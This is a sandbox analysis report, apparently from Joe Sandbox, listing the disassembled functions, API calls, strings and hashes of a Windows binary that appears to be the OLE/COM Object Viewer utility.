#6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00200323
#3087.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C), ref: 00200330
#6211.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C), ref: 00200337
#3087.MFC42U(000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200348
#6211.MFC42U(000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020034F
#3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020035C
#6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200363
#3087.MFC42U(000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200374
#6211.MFC42U(000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020037B
#3087.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200388
#6211.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020038F
#3087.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 0020039C
#6211.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 002003A3
#3087.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C), ref: 002003B0
#6211.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C), ref: 002003B7
#3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001), ref: 002003C4
#6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41,00000001,00000001), ref: 002003CB
#3087.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41), ref: 002003D8
#6211.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,001FFC41), ref: 002003DF
#3087.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 002003EC
#6211.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 002003F3
#3087.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00200400
#6211.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00200407
#3087.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00200414
#6211.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 0020041B
#3087.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00200431
#2634.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00200438
#3087.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00200445
#2634.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 0020044C
#3087.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00200459
#2634.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00200460
#3087.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 0020046D
#2634.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00200474

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #3087$#6211$#2634
String ID:
API String ID: 3514023408-0
Opcode ID: bf1c28694698c79950044fa17a183ef5e5d3e7f507d4d6ad0c1ffa6c28f41c65
Instruction ID: 9510da9570001b519491e87acfaf03578e8432bfa49b94495fb700d0cf1b572c
Opcode Fuzzy Hash: bf1c28694698c79950044fa17a183ef5e5d3e7f507d4d6ad0c1ffa6c28f41c65
Instruction Fuzzy Hash: 0D41E450BA076426FF1D36750C6BF3E605A4BD4B45F028C68B1026F2E3DE594EA14ABF

Function 001FFCE0 Relevance: 49.1, APIs: 18, Strings: 10, Instructions: 108
windowlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4704.MFC42U ref: 001FFCED
SendMessageW.USER32(?,00000143,00000000,None), ref: 001FFD06
SendMessageW.USER32(?,00000143,00000000,Both), ref: 001FFD19
SendMessageW.USER32(?,00000143,00000000,Free), ref: 001FFD2C
SendMessageW.USER32(?,00000143,00000000,Apartment), ref: 001FFD3F
SendMessageW.USER32(?,00000143,00000000,Neutral), ref: 001FFD52
SendMessageW.USER32(?,0000133E,00000000,?), ref: 001FFD84
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 001FFD9E
SendMessageW.USER32(?,0000133E,00000002,00000001), ref: 001FFDB8
#3087.MFC42U(0000008B,00000000), ref: 001FFDC6
#2634.MFC42U(0000008B,00000000), ref: 001FFDCD
#3087.MFC42U(000000A9,00000000,0000008B,00000000), ref: 001FFDDA
#2634.MFC42U(000000A9,00000000,0000008B,00000000), ref: 001FFDE1
#3087.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 001FFDEE
#2634.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 001FFDF5
LoadLibraryW.KERNEL32(OLE32.DLL,000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 001FFDFF
GetProcAddress.KERNEL32(00000000,CoRegisterSurrogate), ref: 001FFE11
FreeLibrary.KERNEL32(00000000), ref: 001FFE26

Strings

Neutral, xrefs: 001FFD45
Both, xrefs: 001FFD0C
Free, xrefs: 001FFD1F
Apartment, xrefs: 001FFD32
CoRegisterSurrogate, xrefs: 001FFE0B
Local Server, xrefs: 001FFD8D
Inproc Handler, xrefs: 001FFDA7
Inproc Server, xrefs: 001FFD7D
OLE32.DLL, xrefs: 001FFDFA
None, xrefs: 001FFCF2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#2634#3087$Library$#4704AddressFreeLoadProc
String ID: Apartment$Both$CoRegisterSurrogate$Free$Inproc Handler$Inproc Server$Local Server$Neutral$None$OLE32.DLL
API String ID: 2746026577-3659237039
Opcode ID: df94706d9a00dc2bcb812975a72a491677729f3095e7dd621496ec67ec678267
Instruction ID: ec9bf6ba34c5c19efd2da0c3d47e9f4ec28c762d003e8886cf375a8fb0d5e11b
Opcode Fuzzy Hash: df94706d9a00dc2bcb812975a72a491677729f3095e7dd621496ec67ec678267
Instruction Fuzzy Hash: 443167316002147BDF206F76DC4EEEBBE79EF82710F014434BA1DAA1A2CBB14552CB60

Function 001FEAE6 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 001FEAED
#338.MFC42U(0000000C,001FEAD7,00000004), ref: 001FEAF7
#540.MFC42U(0000000C,001FEAD7,00000004), ref: 001FEB0B
#860.MFC42U(001F349E,0000000C,001FEAD7,00000004), ref: 001FEB27
#540.MFC42U ref: 001FEB36
#540.MFC42U ref: 001FEB42
#4155.MFC42U(00000004), ref: 001FEB50
#4155.MFC42U(00000008,00000004), ref: 001FEB5A
#3516.MFC42U(?,?,00000005,00000008,00000004), ref: 001FEB6E
#861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEB7E
#3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEB8D
#861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEB9D
#3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEBAC
#800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEBB7
#800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEBBF

Strings

ViewHiddenComCats, xrefs: 001FEB73
ExpertMode, xrefs: 001FEB92

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #3516#540$#4155#800#861$#338#860H_prolog3
String ID: ExpertMode$ViewHiddenComCats
API String ID: 3415677798-816868219
Opcode ID: ac8dcf04c36689394984312c6354199241ab896d340d263d22d011da1b80b279
Instruction ID: 7ba8e62185c4fed4385b77fb3282ca5a6810b7914b5d372020dc6d9278490dae
Opcode Fuzzy Hash: ac8dcf04c36689394984312c6354199241ab896d340d263d22d011da1b80b279
Instruction Fuzzy Hash: BB219074A607099BDF15EBA0C956BBEBBB1AF54300F100858F5513B2D3DBB01A68CF21

Function 00207FF0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 290
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00209205: SendMessageW.USER32(?,00001109,0020803D,00000000), ref: 00209220
Part of subcall function 00209205: #2857.MFC42U(00000000,?,0020803D,00000000,85C979FC), ref: 00209227

#1662.MFC42U(00000000,85C979FC), ref: 0020807F

Part of subcall function 001FE18B: SendMessageW.USER32(?,0000000B,?,00000000), ref: 001FE19A

CoCreateInstance.OLE32(001F36E4,00000000,00000001,001F36F4,00000000,00000000,85C979FC), ref: 002080AB

Part of subcall function 00207F0B: SendMessageW.USER32(?,00001132,00000000,RH ), ref: 00207F1D

#2644.MFC42U(00000000), ref: 00208436

Strings

All Objects, xrefs: 0020830B
OLE Controls, xrefs: 00208250
OLE Embeddable Objects, xrefs: 00208222
Unclassified Objects, xrefs: 0020827E
Object Classes, xrefs: 00208144
Grouped by Component Category, xrefs: 0020817B
g, xrefs: 00208103
Application IDs, xrefs: 00208369
Type Libraries, xrefs: 0020839E
COM Library Objects, xrefs: 002082DA
Interfaces, xrefs: 002083CC
OLE 1.0 Objects, xrefs: 002082AC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#1662#2644#2857CreateInstance
String ID: All Objects$Application IDs$COM Library Objects$Grouped by Component Category$Interfaces$OLE 1.0 Objects$OLE Controls$OLE Embeddable Objects$Object Classes$Type Libraries$Unclassified Objects$g
API String ID: 2376137332-450955224
Opcode ID: 155e58a85b56dae9335d29bfdc35792a4cfa1b518588d9962e491082d39aa04f
Instruction ID: 93c48152bf2a07e64e2e1bc90fa060bb9dd33a36b5098cf7fe4fe60d6bc1bd90
Opcode Fuzzy Hash: 155e58a85b56dae9335d29bfdc35792a4cfa1b518588d9962e491082d39aa04f
Instruction Fuzzy Hash: 40E1A0B0E203199FDB14EFE4C899BAEBBB5BF44304F100419E115AB2D6DBB5A855CF50

Function 001FF090 Relevance: 25.6, APIs: 17, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#3867.MFC42U(?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF09C
#3087.MFC42U(000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF0B2
#2634.MFC42U(000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF0B9
#3087.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF0C6
#2634.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF0CD
#3087.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF0DA
#2634.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 001FF0E1
#3087.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000), ref: 001FF0EE
#2634.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000,0000009C,00000000), ref: 001FF0F5
#3087.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000), ref: 001FF102
#2634.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001,00000001,00000000), ref: 001FF109
#3087.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001), ref: 001FF116
#2634.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,001FFC3A,00000001), ref: 001FF11D
#3087.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 001FF12A
#2634.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 001FF131
#3087.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 001FF13E
#2634.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 001FF145

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2634#3087$#3867
String ID:
API String ID: 580456896-0
Opcode ID: 27a3e5da6b2e4892651e05f811b4cf3ab9f6ffa9aa382167568b2c16dca95e4d
Instruction ID: 235ef131e1d2e698b393e4c7103dcaad8baee27a1466ca466608ef64967df475
Opcode Fuzzy Hash: 27a3e5da6b2e4892651e05f811b4cf3ab9f6ffa9aa382167568b2c16dca95e4d
Instruction Fuzzy Hash: 10017530F6176422DF393275086B9BEA8674FC1B50F068C18F14A5F2E3DD644DA18A9A

Function 001FDA30 Relevance: 22.6, APIs: 15, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4714.MFC42U ref: 001FDA47
#2078.MFC42U(00000085,?), ref: 001FDA60
#2078.MFC42U(00000087,?,00000085,?), ref: 001FDA71
#2078.MFC42U(00000088,?,00000087,?,00000085,?), ref: 001FDA84
#2078.MFC42U(0000008B,?,00000088,?,00000087,?,00000085,?), ref: 001FDA97
#2078.MFC42U(0000008E,?,0000008B,?,00000088,?,00000087,?,00000085,?), ref: 001FDAAA
GetWindowRect.USER32(?,?), ref: 001FDABE
GetWindowRect.USER32(?,?), ref: 001FDAD0

Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8B7
Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8C4
Part of subcall function 001FC8A6: #3133.MFC42U(?,?,?,001FC46E,?), ref: 001FC8CC

#6193.MFC42U(00000000,000000FF,?,?,?,0000001C,?), ref: 001FDB03
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?,?,0000001C,?), ref: 001FDB1B
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?), ref: 001FDB34
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 001FDB48
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 001FDB5C
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 001FDB70
#6127.MFC42U(00000001,00000001,00000001,6CC70790,6CC70790,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8), ref: 001FDB84

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6193$#2078$ClientRectScreenWindow$#3133#4714#6127
String ID:
API String ID: 1113752235-0
Opcode ID: a2187af49d73ebd0c6a28014861abf6cfc96e389c135e245f54fbde1b0bdff84
Instruction ID: 92d93db30d5a718970983839c6652c4595b755099a30d9c435eb0e31bed4a5fc
Opcode Fuzzy Hash: a2187af49d73ebd0c6a28014861abf6cfc96e389c135e245f54fbde1b0bdff84
Instruction Fuzzy Hash: 60416F707503047BEB20EB55DC8AFEB7A68EB85B54F40447CB609AE1C3CE616D05CB60

Function 0020BD2A Relevance: 17.5, APIs: 4, Strings: 6, Instructions: 25
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0020D4CD: GetVersionExW.KERNEL32(?), ref: 0020D4F3

LoadLibraryW.KERNELBASE(ACLUI.DLL,001FB51D), ref: 0020BD38
MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 0020BD50
exit.MSVCRT ref: 0020BD58
GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 0020BD64

Strings

OLEViewer, xrefs: 0020BD74
EditSecurity, xrefs: 0020BD5E
ACLUI.DLL, xrefs: 0020BD33
OleViewer, xrefs: 0020BD44
Couldn't get address of EditSecurity ACLUI.DLL!, xrefs: 0020BD79
Couldn't load ACLUI.DLL!, xrefs: 0020BD49

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: AddressLibraryLoadMessageProcVersionexit
String ID: ACLUI.DLL$Couldn't get address of EditSecurity ACLUI.DLL!$Couldn't load ACLUI.DLL!$EditSecurity$OLEViewer$OleViewer
API String ID: 2950567464-1848169023
Opcode ID: 67aa66c7ca3e729b268544065d411be95ac012f27f28178d78ccfd57263cdf38
Instruction ID: 41482b5bc1c562aad93e7bbe1a2a374eb6bc5a7174d27ff2c9da25877b35f05d
Opcode Fuzzy Hash: 67aa66c7ca3e729b268544065d411be95ac012f27f28178d78ccfd57263cdf38
Instruction Fuzzy Hash: E3E04F703A570ABBDB313F617D0FF79AA96AB28F02F154050F74AE40E2EFE195204619

Function 6C4E5A1D Relevance: 16.7, APIs: 11, Instructions: 188
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C4E5602: HeapFree.KERNEL32(00000000,00000000,?,6C4E4C74), ref: 6C4E5618
Part of subcall function 6C4E5602: GetLastError.KERNEL32(?,?,6C4E4C74), ref: 6C4E5623

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5B4E
GetExitCodeProcess.KERNELBASE(?,?), ref: 6C4E5B5B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5B70
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5B7B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5B86
__dosmaperr.LIBCMT ref: 6C4E5B8D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5B98
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5BA3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5BB5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5BC0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4E5BF1

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
String ID:
API String ID: 2764183375-0
Opcode ID: 3bf2ef161729bdd0bf96157051f321297f751f7d8f5a3a5788e16317d50178a8
Instruction ID: 9f680abe1006d520b3026fabb40d63d526b21c03a95007e08d208960dfc46a59
Opcode Fuzzy Hash: 3bf2ef161729bdd0bf96157051f321297f751f7d8f5a3a5788e16317d50178a8
Instruction Fuzzy Hash: 4151B371D01208EFDF11EFA4C885EEE7BB9EF4D31BF124059E914A6640DB314A48DBA1

Function 0020EE23 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 138sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?,002123D8,00000058), ref: 0020EE38
Sleep.KERNEL32(000003E8), ref: 0020EE6D
_amsg_exit.MSVCRT ref: 0020EE82
_initterm.MSVCRT ref: 0020EED6
__IsNonwritableInCurrentImage.LIBCMT ref: 0020EF02
exit.MSVCRT ref: 0020EF85

Strings

\>!, xrefs: 0020EEED
\>!, xrefs: 0020EE4C

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID: \>!$\>!
API String ID: 2849151604-4237482058
Opcode ID: f0f0983096f221dc17c129f2fd5729d44c3fe5eddb7213bdf3287a9c780ceebd
Instruction ID: 86c9d82452d2e4516927c2abd089e8bdd3a594330f8459b77fb9be358a8648a1
Opcode Fuzzy Hash: f0f0983096f221dc17c129f2fd5729d44c3fe5eddb7213bdf3287a9c780ceebd
Instruction Fuzzy Hash: 1C410571A6431B9BDF24DF58E8087A976B2FB24720F114929E905976D2CFB08DD1CA90

Function 00200D90 Relevance: 15.1, APIs: 10, Instructions: 74COMMON

Download Yara Rule

APIs

#5491.MFC42U ref: 00200DA3
#4451.MFC42U(?), ref: 00200DAD
#2112.MFC42U(?,50002800,0000E800,?), ref: 00200DCE
#4158.MFC42U(00000002,?,50002800,0000E800,?), ref: 00200DDF
#5867.MFC42U(?,00000002,?,50002800,0000E800,?), ref: 00200DF4
#2109.MFC42U(?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00200E0C
#5996.MFC42U(002139A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00200E1E
#3477.MFC42U(00000000,?,?,?,002139A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00200E37
#6063.MFC42U(00000000,00000000,?,?,00000000,?,?,?,002139A0,00000001,?,50008200,0000E801,?,00000002), ref: 00200E4E
#2550.MFC42U(00000001,00000000,00000000,?,?,00000000,?,?,?,002139A0,00000001,?,50008200,0000E801,?,00000002), ref: 00200E57

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

